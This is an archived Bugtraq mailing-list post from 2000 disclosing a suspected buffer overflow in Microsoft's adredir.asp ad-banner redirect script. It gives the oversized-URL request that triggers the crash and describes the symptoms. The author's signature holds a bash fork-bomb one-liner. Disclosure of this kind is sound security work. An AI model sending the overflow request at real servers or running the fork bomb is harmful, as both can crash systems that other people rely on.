Bugtraq mailing list archives
Microsoft BackOffice component: adredir.asp
From: lcamtuf () TPI PL (Michal Zalewski)
Date: Sat, 3 Jun 2000 14:00:16 +0200
Bkgrnd: adredir.asp is commonly used component of IIS-based commercial sites, used to handle ad banners. Altavista dumps pretty impressive list of sites using it. Usually, this script lives in subdirectory on main IIS server, or on dedicated ad server - you could easily obtain it's location by inspecting banner code... adredir.asp is often renamed to 'redirect.asp' or so, but quite popular. This BO component (the first and only I'm going to check - responsible web admins shouldn't use IIS+ASP at all, choosing more secure solutions, like Apache+SSI or even Apache+IIS, IMHO) has buffer overflow. It can be exploited by sending request like: GET /place_it_lives_in/adredir.asp?url=(more than +/- 500 bytes) By choosing something around 500-510 bytes (depending on directory name length), you'll notice first change - server will drop connection after returning '302 Moved' http header. Normally, it prints these headers, and then some html code as well: <body><h1>Object Moved</h1>This object may be found <a HREF="AAAA.... Probably this HTML is rendered into small text buffer, and script crashes while trying to assemble it. With approx 1000 bytes of junk, script will die without even displaying headers. Funny. And exploitable, I guess. I have no idea about symptoms on NT machine, probably not much, at least it not crashes (wow, uncommon!). Have a good day. Someone might want to check if I'm right, but I can't imagine it might be something else than overflow. Btw. OAS (Oracle Application Server) / OWL (Oracle Web Listener) users shouldn't feel safe. More details soon. Standard disclaimer applies. Yeah, yeah. Hi to: b0f, lam3rz, HERT, teso and other people. _______________________________________________________ Michal Zalewski [lcamtuf () tpi pl] [tp.internet/security] [http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};: =-----=> God is real, unless declared integer. <=-----=
Current thread:
- Re: IBM HTTP SERVER / APACHE (DoS) H D Moore (Jun 01)
- Re: IBM HTTP SERVER / APACHE (DoS) H D Moore (Jun 01)
- [rootshell.com] Xterm DoS Attack Kit Knox (Jun 01)
- Re: [rootshell.com] Xterm DoS Attack Michael Jennings (Jun 01)
- Re: [rootshell.com] Xterm DoS Attack Walt (Jun 01)
- Re: [rootshell.com] Xterm DoS Attack Soeren Staun-Pedersen (Jun 02)
- Insecure encryption in PassWD v1.2 Daniel Roethlisberger (Jun 03)
- Re: [rootshell.com] Xterm DoS Attack Wakko Ellington Warner-Warner III (Jun 04)
- Linux-Mandrake Xlockmore security update Chmouel Boudjnah (Jun 04)
- Microsoft BackOffice component: adredir.asp Michal Zalewski (Jun 03)
- Re: [rootshell.com] Xterm DoS Attack Darren Reed (Jun 02)
- Re: [rootshell.com] Xterm DoS Attack gavina () CSIS GVSU EDU (Jun 02)
- [Debian] Majordomo will be removed Aleph One (Jun 03)
- /usr/bin/Mail exploit for Slackware 7.0 (mail-slack.c) Paulo Ribeiro (Jun 02)
- Re: /usr/bin/Mail exploit for Slackware 7.0 (mail-slack.c) Christopher Schulte (Jun 04)
- [Gael Duval <gduval () mandrakesoft com>] [Security Announce] cdrecord Chmouel Boudjnah (Jun 03)
- Remote DoS attack in Real Networks Real Server (Strike #2) Vulnerability Ussr Labs (Aug 01)
- Re: Remote DoS attack in Real Networks Real Server (Strike #2)Vulnerability Jeff Long (Jun 02)
- [JOLT2] Remote Denial of Service against Be/OS. visi0n (Jun 01)
- Re: Remote DoS attack in Real Networks Real Server (Strike #2)Vulnerability Jeff Long (Jun 02)
- Re: Remote DoS attack in Real Networks Real Server (Strike #2)Vulnerability Jeff Long (Jun 02)